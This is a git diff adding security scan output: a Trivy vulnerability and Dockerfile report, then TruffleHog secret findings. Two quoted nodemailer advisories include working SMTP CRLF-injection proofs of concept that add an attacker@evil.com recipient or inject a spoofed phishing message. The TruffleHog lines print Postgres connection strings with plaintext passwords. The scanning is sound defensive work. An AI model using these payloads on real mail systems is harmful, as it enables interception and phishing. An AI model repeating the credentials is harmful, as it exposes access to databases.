"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-14874", + "https://bugzilla.redhat.com/show_bug.cgi?id=2418133", + "https://github.com/nodemailer/nodemailer", + "https://github.com/nodemailer/nodemailer/commit/b61b9c0cfd682b6f647754ca338373b68336a150", + "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-rcmh-qjqh-p98v", + "https://nvd.nist.gov/vuln/detail/CVE-2025-14874", + "https://www.cve.org/CVERecord?id=CVE-2025-14874" + ], + "PublishedDate": "2025-12-18T09:15:44.87Z", + "LastModifiedDate": "2026-01-08T03:15:43.19Z" + }, + { + "VulnerabilityID": "CVE-2025-13033", + "VendorIDs": [ + "GHSA-mm7p-fcc7-pg87" + ], + "PkgID": "nodemailer@6.10.1", + "PkgName": "nodemailer", + "PkgIdentifier": { + "PURL": "pkg:npm/nodemailer@6.10.1", + "UID": "c243d03ecfce3c20" + }, + "InstalledVersion": "6.10.1", + "FixedVersion": "7.0.7", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-13033", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:718ace41991afee3a924eee3b40006635632701df5e1f2e2afabf15077a6d79b", + "Title": "nodemailer: Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict", + "Description": "A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker's external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-1286" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P", + "V40Score": 5.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:15979", + "https://access.redhat.com/errata/RHSA-2026:3751", + "https://access.redhat.com/security/cve/CVE-2025-13033", + "https://bugzilla.redhat.com/show_bug.cgi?id=2402179", + "https://github.com/nodemailer/nodemailer", + "https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626", + "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87", + "https://nvd.nist.gov/vuln/detail/CVE-2025-13033", + "https://www.cve.org/CVERecord?id=CVE-2025-13033" + ], + "PublishedDate": "2025-11-14T20:15:45.957Z", + "LastModifiedDate": "2026-05-11T13:16:10.037Z" + }, + { + "VulnerabilityID": "GHSA-vvjj-xcjg-gr5g", + "PkgID": "nodemailer@6.10.1", + "PkgName": "nodemailer", + "PkgIdentifier": { + "PURL": "pkg:npm/nodemailer@6.10.1", + "UID": "c243d03ecfce3c20" + }, + "InstalledVersion": "6.10.1", + "FixedVersion": "8.0.5", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://github.com/advisories/GHSA-vvjj-xcjg-gr5g", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:17380daa219fcd2acb5ff13abdf591be99d5ba1498a2e827b85876cb23d42d77", + "Title": "Nodemailer Vulnerable to SMTP Command Injection via CRLF in Transport name Option (EHLO/HELO) ", + "Description": "### Summary\n\nNodemailer versions up to and including 8.0.4 are vulnerable to SMTP command injection via CRLF sequences in the transport `name` configuration option. The `name` value is used directly in the EHLO/HELO SMTP command without any sanitization for carriage return and line feed characters (`\\r\\n`). An attacker who can influence this option can inject arbitrary SMTP commands, enabling unauthorized email sending, email spoofing, and phishing attacks.\n\n### Details\n\nThe vulnerability exists in `lib/smtp-connection/index.js`. When establishing an SMTP connection, the `name` option is concatenated directly into the EHLO command:\n\n```javascript\n// lib/smtp-connection/index.js, line 71\nthis.name = this.options.name || this._getHostname();\n\n// line 1336\nthis._sendCommand('EHLO ' + this.name);\n```\n\nThe `_sendCommand` method writes the string directly to the socket followed by `\\r\\n` (line 1082):\n\n```javascript\nthis._socket.write(Buffer.from(str + '\\r\\n', 'utf-8'));\n```\n\nIf the `name` option contains `\\r\\n` sequences, each injected line is interpreted by the SMTP server as a separate command. Unlike the `envelope.from` and `envelope.to` fields which are validated for `\\r\\n` (line 1107-1119), and unlike `envelope.size` which was recently fixed (GHSA-c7w3-x93f-qmm8) by casting to a number, the `name` parameter receives no CRLF sanitization whatsoever.\n\nThis is distinct from the previously reported GHSA-c7w3-x93f-qmm8 (envelope.size injection) as it affects a different parameter (`name` vs `size`), uses a different injection point (EHLO command vs MAIL FROM command), and occurs at connection initialization rather than during message sending.\n\nThe `name` option is also used in HELO (line 1384) and LHLO (line 1333) commands with the same lack of sanitization.\n\n### PoC\n\n```javascript\nconst nodemailer = require('nodemailer');\nconst net = require('net');\n\n// Simple SMTP server to observe injected commands\nconst server = net.createServer(socket =\u003e {\n socket.write('220 test ESMTP\\r\\n');\n socket.on('data', data =\u003e {\n const lines = data.toString().split('\\r\\n').filter(l =\u003e l);\n lines.forEach(line =\u003e {\n console.log('SMTP CMD:', line);\n if (line.startsWith('EHLO') || line.startsWith('HELO'))\n socket.write('250 OK\\r\\n');\n else if (line.startsWith('MAIL FROM'))\n socket.write('250 OK\\r\\n');\n else if (line.startsWith('RCPT TO'))\n socket.write('250 OK\\r\\n');\n else if (line === 'DATA')\n socket.write('354 Go\\r\\n');\n else if (line === '.')\n socket.write('250 OK\\r\\n');\n else if (line === 'QUIT')\n { socket.write('221 Bye\\r\\n'); socket.end(); }\n else if (line === 'RSET')\n socket.write('250 OK\\r\\n');\n });\n });\n});\n\nserver.listen(0, '127.0.0.1', () =\u003e {\n const port = server.address().port;\n\n // Inject a complete phishing email via EHLO name\n const transport = nodemailer.createTransport({\n host: '127.0.0.1',\n port: port,\n secure: false,\n name: 'legit.host\\r\\nMAIL FROM:\u003cattacker@evil.com\u003e\\r\\n'\n + 'RCPT TO:\u003cvictim@target.com\u003e\\r\\nDATA\\r\\n'\n + 'From: ceo@company.com\\r\\nTo: victim@target.com\\r\\n'\n + 'Subject: Urgent\\r\\n\\r\\nPhishing content\\r\\n.\\r\\nRSET'\n });\n\n transport.sendMail({\n from: 'legit@example.com',\n to: 'legit-recipient@example.com',\n subject: 'Normal email',\n text: 'Normal content'\n }, () =\u003e { server.close(); process.exit(0); });\n});\n```\n\nRunning this PoC shows the SMTP server receives the injected MAIL FROM, RCPT TO, DATA, and phishing email content as separate SMTP commands before the legitimate email is sent.\n\n### Impact\n\n**Who is affected:** Applications that allow users or external input to configure the `name` SMTP transport option. This includes:\n- Multi-tenant SaaS platforms with per-tenant SMTP configuration\n- Admin panels where SMTP hostname/name settings are stored in databases\n- Applications loading SMTP config from environment variables or external sources\n\n**What can an attacker do:**\n1. **Send unauthorized emails** to arbitrary recipients by injecting MAIL FROM and RCPT TO commands\n2. **Spoof email senders** by injecting arbitrary From headers in the DATA portion\n3. **Conduct phishing attacks** using the legitimate SMTP server as a relay\n4. **Bypass application-level controls** on email recipients, since the injected commands are processed before the application's intended MAIL FROM/RCPT TO\n5. **Perform SMTP reconnaissance** by injecting commands like VRFY or EXPN\n\nThe injection occurs at the EHLO stage (before authentication in most SMTP flows), making it particularly dangerous as the injected commands may be processed with the server's trust context.\n\n**Recommended fix:** Sanitize the `name` option by stripping or rejecting CRLF sequences, similar to how `envelope.from` and `envelope.to` are already validated on lines 1107-1119 of `lib/smtp-connection/index.js`. For example:\n\n```javascript\nthis.name = (this.options.name || this._getHostname()).replace(/[\\r\\n]/g, '');\n```", + "Severity": "MEDIUM", + "VendorSeverity": { + "ghsa": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 4.9 + } + }, + "References": [ + "https://github.com/nodemailer/nodemailer", + "https://github.com/nodemailer/nodemailer/commit/0a43876801a420ca528f492eaa01bfc421cc306e", + "https://github.com/nodemailer/nodemailer/releases/tag/v8.0.5", + "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-vvjj-xcjg-gr5g" + ], + "PublishedDate": "2026-04-08T15:05:20Z", + "LastModifiedDate": "2026-04-08T15:05:20Z" + }, + { + "VulnerabilityID": "GHSA-c7w3-x93f-qmm8", + "PkgID": "nodemailer@6.10.1", + "PkgName": "nodemailer", + "PkgIdentifier": { + "PURL": "pkg:npm/nodemailer@6.10.1", + "UID": "c243d03ecfce3c20" + }, + "InstalledVersion": "6.10.1", + "FixedVersion": "8.0.4", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://github.com/advisories/GHSA-c7w3-x93f-qmm8", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:db7b269ba78fc172252ce3cd328867fff8504078f310f34689e0690febfd1a1e", + "Title": "Nodemailer has SMTP command injection due to unsanitized `envelope.size` parameter", + "Description": "### Summary\nWhen a custom `envelope` object is passed to `sendMail()` with a `size` property containing CRLF characters (`\\r\\n`), the value is concatenated directly into the SMTP `MAIL FROM` command without sanitization. This allows injection of arbitrary SMTP commands, including `RCPT TO` — silently adding attacker-controlled recipients to outgoing emails.\n\n\n### Details\nIn `lib/smtp-connection/index.js` (lines 1161-1162), the `envelope.size` value is concatenated into the SMTP `MAIL FROM` command without any CRLF sanitization:\n\n```javascript\nif (this._envelope.size \u0026\u0026 this._supportedExtensions.includes('SIZE')) {\n args.push('SIZE=' + this._envelope.size);\n}\n```\n\nThis contrasts with other envelope parameters in the same function that ARE properly sanitized:\n- **Addresses** (`from`, `to`): validated for `[\\r\\n\u003c\u003e]` at lines 1107-1127\n- **DSN parameters** (`dsn.ret`, `dsn.envid`, `dsn.orcpt`): encoded via `encodeXText()` at lines 1167-1183\n\nThe `size` property reaches this code path through `MimeNode.setEnvelope()` in `lib/mime-node/index.js` (lines 854-858), which copies all non-standard envelope properties verbatim:\n\n```javascript\nconst standardFields = ['to', 'cc', 'bcc', 'from'];\nObject.keys(envelope).forEach(key =\u003e {\n if (!standardFields.includes(key)) {\n this._envelope[key] = envelope[key];\n }\n});\n```\n\nSince `_sendCommand()` writes the command string followed by `\\r\\n` to the raw TCP socket, a CRLF in the `size` value terminates the `MAIL FROM` command and starts a new SMTP command.\n\nNote: by default, Nodemailer constructs the envelope automatically from the message's `from`/`to` fields and does not include `size`. This vulnerability requires the application to explicitly pass a custom `envelope` object with a `size` property to `sendMail()`. \nWhile this limits the attack surface, applications that expose envelope configuration to users are affected.\n\n### PoC\nave the following as `poc.js` and run with `node poc.js`:\n\n```javascript\nconst net = require('net');\nconst nodemailer = require('nodemailer');\n\n// Minimal SMTP server that logs raw commands\nconst server = net.createServer(socket =\u003e {\n socket.write('220 localhost ESMTP\\r\\n');\n let buffer = '';\n socket.on('data', chunk =\u003e {\n buffer += chunk.toString();\n const lines = buffer.split('\\r\\n');\n buffer = lines.pop();\n for (const line of lines) {\n if (!line) continue;\n console.log('C:', line);\n if (line.startsWith('EHLO')) {\n socket.write('250-localhost\\r\\n250-SIZE 10485760\\r\\n250 OK\\r\\n');\n } else if (line.startsWith('MAIL FROM')) {\n socket.write('250 OK\\r\\n');\n } else if (line.startsWith('RCPT TO')) {\n socket.write('250 OK\\r\\n');\n } else if (line === 'DATA') {\n socket.write('354 Start\\r\\n');\n } else if (line === '.') {\n socket.write('250 OK\\r\\n');\n } else if (line.startsWith('QUIT')) {\n socket.write('221 Bye\\r\\n');\n socket.end();\n }\n }\n });\n});\n\nserver.listen(0, '127.0.0.1', () =\u003e {\n const port = server.address().port;\n console.log('SMTP server on port', port);\n console.log('Sending email with injected RCPT TO...\\n');\n\n const transporter = nodemailer.createTransport({\n host: '127.0.0.1',\n port,\n secure: false,\n tls: { rejectUnauthorized: false },\n });\n\n transporter.sendMail({\n from: 'sender@example.com',\n to: 'recipient@example.com',\n subject: 'Normal email',\n text: 'This is a normal email.',\n envelope: {\n from: 'sender@example.com',\n to: ['recipient@example.com'],\n size: '100\\r\\nRCPT TO:\u003cattacker@evil.com\u003e',\n },\n }, (err) =\u003e {\n if (err) console.error('Error:', err.message);\n console.log('\\nExpected output above:');\n console.log(' C: MAIL FROM:\u003csender@example.com\u003e SIZE=100');\n console.log(' C: RCPT TO:\u003cattacker@evil.com\u003e \u003c-- INJECTED');\n console.log(' C: RCPT TO:\u003crecipient@example.com\u003e');\n server.close();\n transporter.close();\n });\n});\n```\n\n**Expected output:**\n```\nSMTP server on port 12345\nSending email with injected RCPT TO...\n\nC: EHLO [127.0.0.1]\nC: MAIL FROM:\u003csender@example.com\u003e SIZE=100\nC: RCPT TO:\u003cattacker@evil.com\u003e\nC: RCPT TO:\u003crecipient@example.com\u003e\nC: DATA\n...\nC: .\nC: QUIT\n```\n\nThe `RCPT TO:\u003cattacker@evil.com\u003e` line is injected by the CRLF in the `size` field, silently adding an extra recipient to the email.\n\n### Impact\nThis is an SMTP command injection vulnerability. An attacker who can influence the `envelope.size` property in a `sendMail()` call can:\n\n- **Silently add hidden recipients** to outgoing emails via injected `RCPT TO` commands, receiving copies of all emails sent through the affected transport\n- **Inject arbitrary SMTP commands** (e.g., `RSET`, additional `MAIL FROM` to send entirely separate emails through the server)\n- **Leverage the sending organization's SMTP server reputation** for spam or phishing delivery\n\nThe severity is mitigated by the fact that the `envelope` object must be explicitly provided by the application. Nodemailer's default envelope construction from message headers does not include `size`. Applications that pass through user-controlled data to the envelope options (e.g., via API parameters, admin panels, or template configurations) are vulnerable.\n\nAffected versions: at least v8.0.3 (current); likely all versions where `envelope.size` is supported.", + "Severity": "LOW", + "VendorSeverity": { + "ghsa": 1 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N", + "V40Score": 2.3 + } + }, + "References": [ + "https://github.com/nodemailer/nodemailer", + "https://github.com/nodemailer/nodemailer/commit/2d7b9710e63555a1eb13d721296c51186d4b5651", + "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-c7w3-x93f-qmm8" + ], + "PublishedDate": "2026-03-26T22:26:46Z", + "LastModifiedDate": "2026-03-26T22:26:46Z" + }, + { + "VulnerabilityID": "CVE-2026-41305", + "VendorIDs": [ + "GHSA-qx2v-qp2m-jg93" + ], + "PkgID": "postcss@8.4.31", + "PkgName": "postcss", + "PkgIdentifier": { + "PURL": "pkg:npm/postcss@8.4.31", + "UID": "d845910d063cee9a" + }, + "InstalledVersion": "8.4.31", + "FixedVersion": "8.5.10", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41305", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:0086ad0890ab40dce9aff6b30459bf2f3c009f942faa4825d50709ee67cab3d6", + "Title": "postcss: PostCSS: Cross-Site Scripting (XSS) via improper escaping of style closing tags", + "Description": "PostCSS takes a CSS file and provides an API to analyze and modify its rules by transforming the rules into an Abstract Syntax Tree. Versions prior to 8.5.10 do not escape `\u003c/style\u003e` sequences when stringifying CSS ASTs. When user-submitted CSS is parsed and re-stringified for embedding in HTML `\u003cstyle\u003e` tags, `\u003c/style\u003e` in CSS values breaks out of the style context, enabling XSS. Version 8.5.10 fixes the issue.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-79" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V3Score": 6.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V3Score": 6.1 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-41305", + "https://github.com/postcss/postcss", + "https://github.com/postcss/postcss/releases/tag/8.5.10", + "https://github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93", + "https://nvd.nist.gov/vuln/detail/CVE-2026-41305", + "https://www.cve.org/CVERecord?id=CVE-2026-41305" + ], + "PublishedDate": "2026-04-24T03:16:11.547Z", + "LastModifiedDate": "2026-04-24T17:16:21.5Z" + }, + { + "VulnerabilityID": "CVE-2026-45740", + "VendorIDs": [ + "GHSA-jggg-4jg4-v7c6" + ], + "PkgID": "protobufjs@7.5.6", + "PkgName": "protobufjs", + "PkgIdentifier": { + "PURL": "pkg:npm/protobufjs@7.5.6", + "UID": "11481e02f6a2a6cd" + }, + "InstalledVersion": "7.5.6", + "FixedVersion": "7.5.8, 8.2.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-45740", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:0c7c535ab3a0329218c83c03c24db05aed8e9bc3de59ef7112b23085b7c52d89", + "Title": "protobufjs: Denial of Service via unbounded recursive JSON descriptor expansion", + "Description": "protobufjs compiles protobuf definitions into JavaScript (JS) functions. Prior to 7.5.8 and 8.2.0, protobufjs could recurse without a depth limit while expanding nested JSON descriptors through Root.fromJSON() and Namespace.addJSON(). A crafted JSON descriptor with deeply nested namespace definitions could cause the JavaScript call stack to be exhausted during descriptor loading. This vulnerability is fixed in 7.5.8 and 8.2.0.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-674" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/protobufjs/protobuf.js", + "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-jggg-4jg4-v7c6", + "https://nvd.nist.gov/vuln/detail/CVE-2026-45740" + ], + "PublishedDate": "2026-05-13T16:17:00.52Z", + "LastModifiedDate": "2026-05-13T20:50:15.587Z" + }, + { + "VulnerabilityID": "CVE-2026-45736", + "VendorIDs": [ + "GHSA-58qx-3vcg-4xpx" + ], + "PkgID": "ws@8.18.3", + "PkgName": "ws", + "PkgIdentifier": { + "PURL": "pkg:npm/ws@8.18.3", + "UID": "f8dc386179443300" + }, + "InstalledVersion": "8.18.3", + "FixedVersion": "8.20.1", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-45736", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:54b51dc0dfb29c3a34ed11a3c1a3c26e8c1546c9a2c83cff9b3d42b63d290b98", + "Title": "ws is an open source WebSocket client and server for Node.js. Prior to ...", + "Description": "ws is an open source WebSocket client and server for Node.js. Prior to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized memory disclosure when a TypedArray is passed as the reason argument. This vulnerability is fixed in 8.20.1.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-908" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N", + "V3Score": 4.4 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "V3Score": 7.5 + } + }, + "References": [ + "https://github.com/websockets/ws", + "https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086", + "https://github.com/websockets/ws/security/advisories/GHSA-58qx-3vcg-4xpx", + "https://nvd.nist.gov/vuln/detail/CVE-2026-45736" + ], + "PublishedDate": "2026-05-15T15:16:54.103Z", + "LastModifiedDate": "2026-05-19T14:39:20.353Z" + } + ] + }, + { + "Target": "Dockerfile.dev", + "Class": "config", + "Type": "dockerfile", + "MisconfSummary": { + "Successes": 25, + "Failures": 2 + }, + "Misconfigurations": [ + { + "Type": "Dockerfile Security Check", + "ID": "DS-0002", + "Title": "Image user should not be 'root'", + "Description": "Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.", + "Message": "Specify at least 1 USER command in Dockerfile with non-root user as argument", + "Namespace": "builtin.dockerfile.DS002", + "Query": "data.builtin.dockerfile.DS002.deny", + "Resolution": "Add 'USER \u003cnon root user name\u003e' line to the Dockerfile", + "Severity": "HIGH", + "PrimaryURL": "https://avd.aquasec.com/misconfig/ds-0002", + "References": [ + "https://docs.docker.com/develop/develop-images/dockerfile_best-practices/", + "https://avd.aquasec.com/misconfig/ds-0002" + ], + "Status": "FAIL", + "CauseMetadata": { + "Provider": "Dockerfile", + "Service": "general" + } + }, + { + "Type": "Dockerfile Security Check", + "ID": "DS-0026", + "Title": "No HEALTHCHECK defined", + "Description": "You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers.", + "Message": "Add HEALTHCHECK instruction in your Dockerfile", + "Namespace": "builtin.dockerfile.DS026", + "Query": "data.builtin.dockerfile.DS026.deny", + "Resolution": "Add HEALTHCHECK instruction in Dockerfile", + "Severity": "LOW", + "PrimaryURL": "https://avd.aquasec.com/misconfig/ds-0026", + "References": [ + "https://blog.aquasec.com/docker-security-best-practices", + "https://avd.aquasec.com/misconfig/ds-0026" + ], + "Status": "FAIL", + "CauseMetadata": { + "Provider": "Dockerfile", + "Service": "general" + } + } + ] + }, + { + "Target": "Dockerfile.production", + "Class": "config", + "Type": "dockerfile", + "MisconfSummary": { + "Successes": 25, + "Failures": 2 + }, + "Misconfigurations": [ + { + "Type": "Dockerfile Security Check", + "ID": "DS-0002", + "Title": "Image user should not be 'root'", + "Description": "Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.", + "Message": "Specify at least 1 USER command in Dockerfile with non-root user as argument", + "Namespace": "builtin.dockerfile.DS002", + "Query": "data.builtin.dockerfile.DS002.deny", + "Resolution": "Add 'USER \u003cnon root user name\u003e' line to the Dockerfile", + "Severity": "HIGH", + "PrimaryURL": "https://avd.aquasec.com/misconfig/ds-0002", + "References": [ + "https://docs.docker.com/develop/develop-images/dockerfile_best-practices/", + "https://avd.aquasec.com/misconfig/ds-0002" + ], + "Status": "FAIL", + "CauseMetadata": { + "Provider": "Dockerfile", + "Service": "general" + } + }, + { + "Type": "Dockerfile Security Check", + "ID": "DS-0026", + "Title": "No HEALTHCHECK defined", + "Description": "You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers.", + "Message": "Add HEALTHCHECK instruction in your Dockerfile", + "Namespace": "builtin.dockerfile.DS026", + "Query": "data.builtin.dockerfile.DS026.deny", + "Resolution": "Add HEALTHCHECK instruction in Dockerfile", + "Severity": "LOW", + "PrimaryURL": "https://avd.aquasec.com/misconfig/ds-0026", + "References": [ + "https://blog.aquasec.com/docker-security-best-practices", + "https://avd.aquasec.com/misconfig/ds-0026" + ], + "Status": "FAIL", + "CauseMetadata": { + "Provider": "Dockerfile", + "Service": "general" + } + } + ] + }, + { + "Target": "Dockerfile.test", + "Class": "config", + "Type": "dockerfile", + "MisconfSummary": { + "Successes": 25, + "Failures": 2 + }, + "Misconfigurations": [ + { + "Type": "Dockerfile Security Check", + "ID": "DS-0002", + "Title": "Image user should not be 'root'", + "Description": "Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.", + "Message": "Specify at least 1 USER command in Dockerfile with non-root user as argument", + "Namespace": "builtin.dockerfile.DS002", + "Query": "data.builtin.dockerfile.DS002.deny", + "Resolution": "Add 'USER \u003cnon root user name\u003e' line to the Dockerfile", + "Severity": "HIGH", + "PrimaryURL": "https://avd.aquasec.com/misconfig/ds-0002", + "References": [ + "https://docs.docker.com/develop/develop-images/dockerfile_best-practices/", + "https://avd.aquasec.com/misconfig/ds-0002" + ], + "Status": "FAIL", + "CauseMetadata": { + "Provider": "Dockerfile", + "Service": "general" + } + }, + { + "Type": "Dockerfile Security Check", + "ID": "DS-0026", + "Title": "No HEALTHCHECK defined", + "Description": "You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers.", + "Message": "Add HEALTHCHECK instruction in your Dockerfile", + "Namespace": "builtin.dockerfile.DS026", + "Query": "data.builtin.dockerfile.DS026.deny", + "Resolution": "Add HEALTHCHECK instruction in Dockerfile", + "Severity": "LOW", + "PrimaryURL": "https://avd.aquasec.com/misconfig/ds-0026", + "References": [ + "https://blog.aquasec.com/docker-security-best-practices", + "https://avd.aquasec.com/misconfig/ds-0026" + ], + "Status": "FAIL", + "CauseMetadata": { + "Provider": "Dockerfile", + "Service": "general" + } + } + ] + } + ] +} diff --git a/results/individual-repos/scan/trufflehog.json b/results/individual-repos/scan/trufflehog.json new file mode 100644 index 0000000..49dc0cc --- /dev/null +++ b/results/individual-repos/scan/trufflehog.json @@ -0,0 +1,131 @@ +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/.env.docker.production.example","line":9}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":968,"DetectorName":"Postgres","DetectorDescription":"Postgres connection string containing credentials","DecoderName":"PLAIN","Verified":false,"VerificationError":"lookup postgres on 192.168.65.7:53: no such host","VerificationFromCache":false,"Raw":"postgresql://postgres:24DY\u00261u5FLCkNMeiO_p@postgres:5432","RawV2":"postgresql://postgres:24DY\u00261u5FLCkNMeiO_p@postgres:5432","Redacted":"","ExtraData":{"sslmode":"\u003cunset\u003e"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/.env.local","line":1}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":968,"DetectorName":"Postgres","DetectorDescription":"Postgres connection string containing credentials","DecoderName":"PLAIN","Verified":false,"VerificationError":"lookup postgres on 192.168.65.7:53: no such host","VerificationFromCache":false,"Raw":"postgresql://postgres:password@postgres:5432","RawV2":"postgresql://postgres:password@postgres:5432","Redacted":"","ExtraData":{"sslmode":"\u003cunset\u003e"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/.env.docker.dev","line":1}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":968,"DetectorName":"Postgres","DetectorDescription":"Postgres connection string containing credentials","DecoderName":"PLAIN","Verified":false,"VerificationError":"lookup postgres on 192.168.65.7:53: no such host","VerificationFromCache":false,"Raw":"postgresql://postgres:password@postgres:5432","RawV2":"postgresql://postgres:password@postgres:5432","Redacted":"","ExtraData":{"sslmode":"\u003cunset\u003e"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/.env.docker.test","line":1}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":968,"DetectorName":"Postgres","DetectorDescription":"Postgres connection string containing credentials","DecoderName":"PLAIN","Verified":false,"VerificationError":"lookup postgres on 192.168.65.7:53: no such host","VerificationFromCache":false,"Raw":"postgresql://postgres:password@postgres:5432","RawV2":"postgresql://postgres:password@postgres:5432","Redacted":"","ExtraData":{"sslmode":"\u003cunset\u003e"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/.git/objects/36/f1f2601e97763eb410cb11da1550822df5da7c","line":1}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":968,"DetectorName":"Postgres","DetectorDescription":"Postgres connection string containing credentials","DecoderName":"PLAIN","Verified":false,"VerificationError":"lookup postgres on 192.168.65.7:53: no such host","VerificationFromCache":true,"Raw":"postgresql://postgres:password@postgres:5432","RawV2":"postgresql://postgres:password@postgres:5432","Redacted":"","ExtraData":{"sslmode":"\u003cunset\u003e"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/.git/objects/47/697092dbff8805870077515d2ed8c163ee1208","line":7}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":968,"DetectorName":"Postgres","DetectorDescription":"Postgres connection string containing credentials","DecoderName":"PLAIN","Verified":false,"VerificationError":"lookup postgres on 192.168.65.7:53: no such 